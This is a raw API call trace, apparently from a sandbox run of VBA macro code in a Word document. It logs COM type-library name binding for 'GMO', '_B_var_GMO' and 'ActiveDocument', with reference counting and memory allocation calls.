ITypeComp:RemoteBind (in: This=0x3dd7b90, szName="GMO", lHashVal=0x109465, wFlags=0x8, ppTInfo=0x204648, pDescKind=0x20465c, ppFuncDesc=0x204660, ppVarDesc=0x8125440, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x204648*=0x0, pDescKind=0x20465c*=0, ppFuncDesc=0x204660, ppVarDesc=0x8125440, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0045.649] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x33f0362, cbMultiByte=4, lpWideCharStr=0x204690, cchWideChar=5 | out: lpWideCharStr="GMO") returned 4 [0045.649] ITypeComp:RemoteBind (in: This=0x7ee0560, szName="GMO", lHashVal=0x109465, wFlags=0x8, ppTInfo=0x204648, pDescKind=0x20465c, ppFuncDesc=0x204660, ppVarDesc=0x8125440, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x204648*=0x0, pDescKind=0x20465c*=0, ppFuncDesc=0x204660, ppVarDesc=0x8125440, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0045.649] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="GMO") returned 0x109465 [0045.649] strcpy_s (in: _Dst=0x2045f0, _DstSize=0x4, _Src="GMO" | out: _Dst="GMO") returned 0x0 [0045.649] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2045f0, cbMultiByte=4, lpWideCharStr=0x204440, cchWideChar=4 | out: lpWideCharStr="GMO") returned 4 [0045.649] IUnknown:AddRef (This=0x7edf740) returned 0xc [0045.649] ITypeLib:RemoteIsName (in: This=0x7edf740, szNameBuf="GMO", lHashVal=0x109465, pfName=0x204510, pBstrLibName=0x204440 | out: pfName=0x204510*=0, pBstrLibName=0x204440) returned 0x0 [0045.649] IUnknown:Release (This=0x7edf740) returned 0xb [0045.649] IUnknown:AddRef (This=0x3dd7b80) returned 0x14 [0045.649] ITypeLib:RemoteIsName (in: This=0x3dd7b80, szNameBuf="GMO", lHashVal=0x109465, pfName=0x204510, pBstrLibName=0x204440 | out: pfName=0x204510*=0, pBstrLibName=0x204440) returned 0x0 [0045.649] IUnknown:Release (This=0x3dd7b80) returned 0x13 [0045.649] IUnknown:AddRef (This=0x7ee0550) returned 0x9 [0045.649] ITypeLib:RemoteIsName (in: This=0x7ee0550, szNameBuf="GMO", lHashVal=0x109465, pfName=0x204510, pBstrLibName=0x204440 | out: pfName=0x204510*=0, pBstrLibName=0x204440) returned 0x0 [0045.649] IUnknown:Release (This=0x7ee0550) returned 0x8 [0045.649] IUnknown:AddRef (This=0x7edffb0) returned 0x7 [0045.649] ITypeLib:RemoteIsName (in: This=0x7edffb0, szNameBuf="GMO", lHashVal=0x109465, pfName=0x204510, pBstrLibName=0x204440 | out: pfName=0x204510*=0, pBstrLibName=0x204440) returned 0x0 [0045.649] IUnknown:Release (This=0x7edffb0) returned 0x6 [0045.649] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x33f0362, cbMultiByte=4, lpWideCharStr=0x204690, cchWideChar=5 | out: lpWideCharStr="GMO") returned 4 [0045.649] ITypeComp:RemoteBind (in: This=0x7edffc0, szName="GMO", lHashVal=0x109465, wFlags=0x8, ppTInfo=0x204648, pDescKind=0x20465c, ppFuncDesc=0x204660, ppVarDesc=0x7fee3e6230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x204648*=0x0, pDescKind=0x20465c*=0, ppFuncDesc=0x204660, ppVarDesc=0x7fee3e6230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0045.649] IMalloc:Alloc (This=0x7feff045380, cb=0xb) returned 0x817bcd0 [0045.649] _mbscpy_s (in: _Dst=0x817bcd0, _DstSizeInBytes=0x4, _Src=0x33f0362 | out: _Dst=0x817bcd0) returned 0x0 [0045.649] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_GMO") returned 0x105176 [0045.649] strcpy_s (in: _Dst=0x2047a0, _DstSize=0xb, _Src="_B_var_GMO" | out: _Dst="_B_var_GMO") returned 0x0 [0045.649] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2047a0, cbMultiByte=11, lpWideCharStr=0x2045f0, cchWideChar=11 | out: lpWideCharStr="_B_var_GMO") returned 11 [0045.649] IUnknown:AddRef (This=0x7edf740) returned 0xc [0045.649] ITypeLib:RemoteIsName (in: This=0x7edf740, szNameBuf="_B_var_GMO", lHashVal=0x105176, pfName=0x2046c0, pBstrLibName=0x2045f0 | out: pfName=0x2046c0*=0, pBstrLibName=0x2045f0) returned 0x0 [0045.649] IUnknown:Release (This=0x7edf740) returned 0xb [0045.649] IUnknown:AddRef (This=0x3dd7b80) returned 0x14 [0045.649] ITypeLib:RemoteIsName (in: This=0x3dd7b80, szNameBuf="_B_var_GMO", lHashVal=0x105176, pfName=0x2046c0, pBstrLibName=0x2045f0 | out: pfName=0x2046c0*=0, pBstrLibName=0x2045f0) returned 0x0 [0045.650] IUnknown:Release (This=0x3dd7b80) returned 0x13 [0045.650] IUnknown:AddRef (This=0x7ee0550) returned 0x9 [0045.650] ITypeLib:RemoteIsName (in: This=0x7ee0550, szNameBuf="_B_var_GMO", lHashVal=0x105176, pfName=0x2046c0, pBstrLibName=0x2045f0 | out: pfName=0x2046c0*=0, pBstrLibName=0x2045f0) returned 0x0 [0045.650] IUnknown:Release (This=0x7ee0550) returned 0x8 [0045.650] IUnknown:AddRef (This=0x7edffb0) returned 0x7 [0045.650] ITypeLib:RemoteIsName (in: This=0x7edffb0, szNameBuf="_B_var_GMO", lHashVal=0x105176, pfName=0x2046c0, pBstrLibName=0x2045f0 | out: pfName=0x2046c0*=0, pBstrLibName=0x2045f0) returned 0x0 [0045.650] IUnknown:Release (This=0x7edffb0) returned 0x6 [0045.650] IUnknown:AddRef (This=0x7edf740) returned 0xc [0045.650] IUnknown:Release (This=0x7edf740) returned 0xb [0045.650] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x33f04b2, cbMultiByte=11, lpWideCharStr=0x204650, cchWideChar=12 | out: lpWideCharStr="_B_var_GMO") returned 11 [0045.650] ITypeComp:RemoteBind (in: This=0x7edf750, szName="_B_var_GMO", lHashVal=0x105176, wFlags=0x8, ppTInfo=0x204608, pDescKind=0x20461c, ppFuncDesc=0x204620, ppVarDesc=0x47005f00720061, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x204608*=0x0, pDescKind=0x20461c*=0, ppFuncDesc=0x204620, ppVarDesc=0x47005f00720061, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0045.650] _mbscpy_s (in: _Dst=0x204810, _DstSizeInBytes=0x4, _Src=0x33f0362 | out: _Dst=0x204810) returned 0x0 [0045.650] IMalloc:Free (This=0x7feff045380, pv=0x817bcd0) [0045.651] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x33f00d2, cbMultiByte=15, lpWideCharStr=0x204690, cchWideChar=16 | out: lpWideCharStr="ActiveDocument") returned 15 [0045.651] ITypeComp:RemoteBind (in: This=0x7edf750, szName="ActiveDocument", lHashVal=0x105cd3, wFlags=0x3, ppTInfo=0x204648, pDescKind=0x20465c, ppFuncDesc=0x204660, ppVarDesc=0x8125440, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x204648*=0x0, pDescKind=0x20465c*=0, ppFuncDesc=0x204660, ppVarDesc=0x8125440, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0045.651] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x33f00d2, cbMultiByte=15, lpWideCharStr=0x204690, cchWideChar=16 | out: lpWideCharStr="ActiveDocument") returned 15 [0045.651] ITypeComp:RemoteBind (in: This=0x3dd7b90, szName="ActiveDocument", lHashVal=0x105cd3, wFlags=0x3, ppTInfo=0x204648, pDescKind=0x20465c, ppFuncDesc=0x204660, ppVarDesc=0x8125440, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x204648*=0x7f72088, pDescKind=0x20465c*=4, ppFuncDesc=0x204660, ppVarDesc=0x8125440, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0045.651] ITypeInfo:RemoteGetTypeAttr (in: This=0x7f72088, ppTypeAttr=0x204650, pDummy=0x6 | out: ppTypeAttr=0x204650, pDummy=0x6) returned 0x0 [0045.652] ITypeInfo:LocalReleaseTypeAttr (This=0x7f72088) returned 0x0 [0045.652] ITypeInfo:GetRefTypeInfo (in: This=0x7f72088, hreftype=0xbd80, ppTInfo=0x204138 | out: ppTInfo=0x204138*=0x7f72088) returned 0x0 [0045.652] IUnknown:QueryInterface (in: This=0x7f72088, riid=0x7fee4040b88*(Data1=0xcacc1e88, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x204308 | out: ppvObject=0x204308*=0x0) returned 0x80004002 [0045.652] ITypeInfo:RemoteGetTypeAttr (in: This=0x7f72088, ppTypeAttr=0x204188, pDummy=0x10 | out: ppTypeAttr=0x204188, pDummy=0x10) returned 0x0 [0045.652] ITypeInfo:LocalReleaseTypeAttr (This=0x7f72088) returned 0x0 [0045.652] IMalloc:Realloc (This=0x7feff045380, pv=0x8188280, cb=0x20) returned 0x7dff780 [0045.652] IMalloc:Realloc (This=0x7feff045380, pv=0x8188440, cb=0x28) returned 0x7dfec40 [0045.652] IUnknown:QueryInterface (in: This=0x7f72088, riid=0x7fee4035af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x203e90 | out: ppvObject=0x203e90*=0x0) returned 0x80004002 [0045.652] IUnknown:QueryInterface (in: This=0x7f72088, riid=0x7fee4040b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x203e80 | out: ppvObject=0x203e80*=0x0) returned 0x80004002 [0045.652] IUnknown:QueryInterface (in: This=0x7f72088, riid=0x7fee4040b88*(Data1=0xcacc1e88, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x203e88 | out: ppvObject=0x203e88*=0x0) returned 0x80004002 [0045.652] ITypeInfo:RemoteGetTypeAttr (in: This=0x7f72088, ppTypeAttr=0x203eb8, pDummy=0x10 | out: ppTypeAttr=0x203eb8, pDummy=0x10) returned 0x0 [0045.652] ITypeInfo:LocalReleaseTypeAttr (This=0x7f72088) returned 0x0 [0045.652] IUnknown:AddRef (This=0x7f72088) returned 0x3 [0045.652] IUnknown:QueryInterface (in: This=0x7f72088, riid=0x7fee4040b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x204030 | out: ppvObject=0x204030*=0x0) returned 0x80004002 [0045.652] IUnknown:QueryInterface (in: This=0x7f72088, riid=0x7fee4040b88*(Data1=0xcacc1e88, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x204028 | out: ppvObject=0x204028*=0x0) returned 0x80004002 [0045.652] IUnknown:Release (This=0x7f72088) returned 0x2 [0045.652] IUnknown:Release (This=0x7f72088) returned 0x2 [0045.652] IUnknown:QueryInterface (in: This=0x7f72088, riid=0x7fee4040b88*(Data1=0xcacc1e88, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x204538 | out: ppvObject=0x204538*=0x0) returned 0x80004002 [0045.652] IUnknown:QueryInterface (in: This=0x7f72088, riid=0x7fee4042aa8*(Data1=0xcacc1e89, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x204410 | out: ppvObject=0x204410*=0x0) returned 0x80004002 [0045.652] IUnknown:Release (This=0x7f72088) returned 0x2 [0045.652] IUnknown:AddRef (This=0x7f72088) returned 0x3 [0045.652] ITypeInfo:LocalReleaseVarDesc (This=0x7f72088) returned 0x0 [0045.652] IUnknown:Release (This=0x7f72088) returned 0x2 [0045.653] IUnknown:QueryInterface (in: This=0x7f72088, riid=0x7fee4035af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x204778 | out: ppvObject=0x204778*=0x0) returned 0x80004002 [0045.653] IUnknown:AddRef (This=0x7f72088) returned 0x3 [0045.653] IMalloc:Realloc (This=0x7feff045380, pv=0x7dff120, cb=0x40) returned 0x7fc22c0 [0045.653] IMalloc:Realloc (This=0x7feff045380, pv=0x7dff0f0, cb=0x50) returned 0x7f186d0 [0045.653] IUnknown:QueryInterface (in: This=0x7f72088, riid=0x7fee4035af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x204700 | out: ppvObject=0x204700*=0x0) returned 0x80004002 [0045.653] IUnknown:QueryInterface (in: This=0x7f72088, riid=0x7fee4035af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2046d0 | out: ppvObject=0x2046d0*=0x0) returned 0x80004002 [0045.653] IUnknown:QueryInterface (in: This=0x7f72088, riid=0x7fee4040b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2046c0 | out: ppvObject=0x2046c0*=0x0) returned 0x80004002 [0045.653] IUnknown:QueryInterface (in: This=0x7f72088, riid=0x7fee4040b88*(Data1=0xcacc1e88, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2046c8 | out: ppvObject=0x2046c8*=0x0) returned 0x80004002 [0045.653] ITypeInfo:RemoteGetTypeAttr (in: This=0x7f72088, ppTypeAttr=0x2046f8, pDummy=0x10 | out: ppTypeAttr=0x2046f8, pDummy=0x10) returned 0x0 [0045.653] ITypeInfo:LocalReleaseTypeAttr (This=0x7f72088) returned 0x0 [0045.653] IUnknown:AddRef (This=0x7f72088) returned 0x4 [0045.653] IUnknown:Release (This=0x7f72088) returned 0x3 [0045.653] IUnknown:QueryInterface (in: This=0x7f72088, riid=0x7fee4035af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2048e8 | out: ppvObject=0x2048e8*=0x0) returned 0x80004002 [0045.653] IUnknown:QueryInterface (in: This=0x7f72088, riid=0x7fee4040b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2048e0 | out: ppvObject=0x2048e0*=0x0) returned 0x80004002 [0045.658] IUnknown:QueryInterface (in: This=0x7f72138, riid=0x7fee4035af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x204a98 | out: ppvObject=0x204a98*=0x0) returned 0x80004002 [0045.658] IUnknown:QueryInterface (in: This=0x7f72138, riid=0x7fee4040b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x204aa0 | out: ppvObject=0x204aa0*=0x0) returned 0x80004002 [0045.658] ITypeInfo:GetTypeComp (in: This=0x7f72138, ppTComp=0x204aa8 | out: ppTComp=0x204aa8*=0x7f72140) returned 0x0 [0045.658] IMalloc:Alloc (This=0x7feff045380, cb=0x38) returned 0x7d55c10 [0045.658] IUnknown:AddRef (This=0x7f72140) returned 0x3 [0045.658] IUnknown:Release (This=0x7f72140) returned 0x2 [0045.658] IMalloc:Realloc (This=0x7feff045380, pv=0x811be10, cb=0x90) returned 0x8122c10 [0045.659] IUnknown:Release (This=0x7f72138) returned 0x1 [0045.659] IUnknown:Release (This=0x7f72088) returned 0x3 [0045.659] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x33f00d2, cbMultiByte=15, lpWideCharStr=0x204590, cchWideChar=16 | out: lpWideCharStr="ActiveDocument") returned 15 [0045.659] ITypeComp:RemoteBind (in: This=0x7f72140, szName="ActiveDocument", lHashVal=0x105cd3, wFlags=0x3, ppTInfo=0x204548, pDescKind=0x20455c, ppFuncDesc=0x204560, ppVarDesc=0x0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x204548*=0x7f72138, pDescKind=0x20455c*=1, ppFuncDesc=0x204560, ppVarDesc=0x0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0045.659] ITypeInfo:RemoteGetTypeAttr (in: This=0x7f72138, ppTypeAttr=0x204550, pDummy=0x1 | out: ppTypeAttr=0x204550, pDummy=0x1) returned 0x0 [0045.659] ITypeInfo:LocalReleaseTypeAttr (This=0x7f72138) returned 0x0 [0045.659] ITypeInfo:GetRefTypeInfo (in: This=0x7f72138, hreftype=0xbf00, ppTInfo=0x203e08 | out: ppTInfo=0x203e08*=0x7f722f0) returned 0x0 [0045.659] IUnknown:QueryInterface (in: This=0x7f722f0, riid=0x7fee4040b88*(Data1=0xcacc1e88, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x203fd8 | out: ppvObject=0x203fd8*=0x0) returned 0x80004002 [0045.659] ITypeInfo:RemoteGetTypeAttr (in: This=0x7f722f0, ppTypeAttr=0x203e58, pDummy=0x10 | out: ppTypeAttr=0x203e58, pDummy=0x10) returned 0x0 [0045.659] ITypeInfo:LocalReleaseTypeAttr (This=0x7f722f0) returned 0x0 [0045.659] IUnknown:QueryInterface (in: This=0x7f722f0, riid=0x7fee4035af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x203b60 | out: ppvObject=0x203b60*=0x0) returned 0x80004002 [0045.659] IUnknown:QueryInterface (in: This=0x7f722f0, riid=0x7fee4040b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x203b50 | out: ppvObject=0x203b50*=0x0) returned 0x80004002 [0045.659] IUnknown:QueryInterface (in: This=0x7f722f0, riid=0x7fee4040b88*(Data1=0xcacc1e88, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x203b58 | out: ppvObject=0x203b58*=0x0) returned 0x80004002 [0045.659] ITypeInfo:RemoteGetTypeAttr (in: This=0x7f722f0, ppTypeAttr=0x203b88, pDummy=0x10 | out: ppTypeAttr=0x203b88, pDummy=0x10) returned 0x0 [0045.659] ITypeInfo:LocalReleaseTypeAttr (This=0x7f722f0) returned 0x0 [0045.659] IUnknown:AddRef (This=0x7f722f0) returned 0x3 [0045.659] IUnknown:QueryInterface (in: This=0x7f722f0, riid=0x7fee4040b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x203d00 | out: ppvObject=0x203d00*=0x0) returned 0x80004002 [0045.660] IUnknown:QueryInterface (in: This=0x7f722f0, riid=0x7fee4040b88*(Data1=0xcacc1e88, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x203cf8 | out: ppvObject=0x203cf8*=0x0) returned 0x80004002 [0045.660] IUnknown:Release (This=0x7f722f0) returned 0x2 [0045.660] ITypeInfo:RemoteGetTypeAttr (in: This=0x7f72138, ppTypeAttr=0x204300, pDummy=0x0 | out: ppTypeAttr=0x204300, pDummy=0x0) returned 0x0 [0045.660] ITypeInfo:LocalReleaseTypeAttr (This=0x7f72138) returned 0x0 [0045.660] IUnknown:Release (This=0x7f722f0) returned 0x2 [0045.660] IUnknown:Release (This=0x7f722f0) returned 0x2 [0045.660] IUnknown:QueryInterface (in: This=0x7f72138, riid=0x7fee40340f0*(Data1=0x20412, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x2043b0 | out: ppvObject=0x2043b0*=0x7f72138) returned 0x0 [0045.660] ITypeInfo2:GetFuncIndexOfMemId (in: This=0x7f72138, memid=3, invkind=2, pFuncIndex=0x2043f0 | out: pFuncIndex=0x2043f0*=0x6) returned 0x0 [0045.660] ITypeInfo2:GetFuncCustData (in: This=0x7f72138, index=0x6, GUID=0x7fee4043758*(Data1=0x50867b00, Data2=0xbb69, Data3=0x11d0, Data4=([0]=0xa8, [1]=0xff, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x11, [6]=0x0, [7]=0x59)), pVarVal=0x204408 | out: pVarVal=0x204408*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2044b0, varVal2=0x80f6a50)) returned 0x0 [0045.660] IUnknown:Release (This=0x7f72138) returned 0x2 [0045.660] IUnknown:QueryInterface (in: This=0x7f722f0, riid=0x7fee4040b88*(Data1=0xcacc1e88, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x204368 | out: ppvObject=0x204368*=0x0) returned 0x80004002 [0045.660] IUnknown:QueryInterface (in: This=0x7f722f0, riid=0x7fee4042aa8*(Data1=0xcacc1e89, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x204240 | out: ppvObject=0x204240*=0x0) returned 0x80004002 [0045.660] IUnknown:Release (This=0x7f722f0) returned 0x2 [0045.660] IUnknown:QueryInterface (in: This=0x7f722f0, riid=0x7fee4040b88*(Data1=0xcacc1e88, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x204368 | out: ppvObject=0x204368*=0x0) returned 0x80004002 [0045.660] IUnknown:QueryInterface (in: This=0x7f722f0, riid=0x7fee4042aa8*(Data1=0xcacc1e89, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x204240 | out: ppvObject=0x204240*=0x0) returned 0x80004002 [0045.660] IUnknown:Release (This=0x7f722f0) returned 0x2 [0045.660] IUnknown:AddRef (This=0x7f72138) returned 0x3 [0045.660] ITypeInfo:LocalReleaseFuncDesc (This=0x7f72138) returned 0x0 [0045.660] IUnknown:Release (This=0x7f72138) returned 0x2 [0045.660] IUnknown:QueryInterface (in: This=0x7f72138, riid=0x7fee4035af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x204608 | out: ppvObject=0x204608*=0x0) returned 0x80004002 [0045.660] IUnknown:AddRef (This=0x7f72138) returned 0x3 [0045.660] IUnknown:QueryInterface (in: This=0x7f72138, riid=0x7fee4035af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x204590 | out: ppvObject=0x204590*=0x0) returned 0x80004002 [0045.660] IUnknown:QueryInterface (in: This=0x7f72138, riid=0x7fee4035af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x204560 | out: ppvObject=0x204560*=0x0) returned 0x80004002 [0045.660] IUnknown:QueryInterface (in: This=0x7f72138, riid=0x7fee4040b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x204550 | out: ppvObject=0x204550*=0x0) returned 0x80004002 [0045.661] IUnknown:QueryInterface (in: This=0x7f72138, riid=0x7fee4040b88*(Data1=0xcacc1e88, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x204558 | out: ppvObject=0x204558*=0x0) returned 0x80004002 [0045.661] ITypeInfo:RemoteGetTypeAttr (in: This=0x7f72138, ppTypeAttr=0x204588, pDummy=0x10 | out: ppTypeAttr=0x204588, pDummy=0x10) returned 0x0 [0045.661] ITypeInfo:LocalReleaseTypeAttr (This=0x7f72138) returned 0x0 [0045.661] IUnknown:AddRef (This=0x7f72138) returned 0x4 [0045.661] IUnknown:Release (This=0x7f72138) returned 0x3 [0045.661] IUnknown:QueryInterface (in: This=0x7f72138, riid=0x7fee4035af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x204778 | out: ppvObject=0x204778*=0x0) returned 0x80004002 [0045.661] IUnknown:QueryInterface (in: This=0x7f72138, riid=0x7fee4040b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x204770 | out: ppvObject=0x204770*=0x0) returned 0x80004002 [0045.661] IUnknown:QueryInterface (in: This=0x7f72088, riid=0x7fee4035af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2047b0 | out: ppvObject=0x2047b0*=0x0) returned 0x80004002 [0045.661] IUnknown:QueryInterface (in: This=0x7f72088, riid=0x7fee4040b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2047b8 | out: ppvObject=0x2047b8*=0x0) returned 0x80004002 [0045.661] IUnknown:QueryInterface (in: This=0x7f72088, riid=0x7fee40340f0*(Data1=0x20412, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x2047a8 | out: ppvObject=0x2047a8*=0x7f72088) returned 0x0 [0045.661] ITypeInfo2:GetTypeKind (in: This=0x7f72088, pTypeKind=0x204804 | out: pTypeKind=0x204804*=5) returned 0x0 [0045.661] IUnknown:Release (This=0x7f72088) returned 0x4 [0045.661] ITypeInfo:RemoteGetTypeAttr (in: This=0x7f72138, ppTypeAttr=0x2040b0, pDummy=0x0 | out: ppTypeAttr=0x2040b0, pDummy=0x0) returned 0x0 [0045.661] 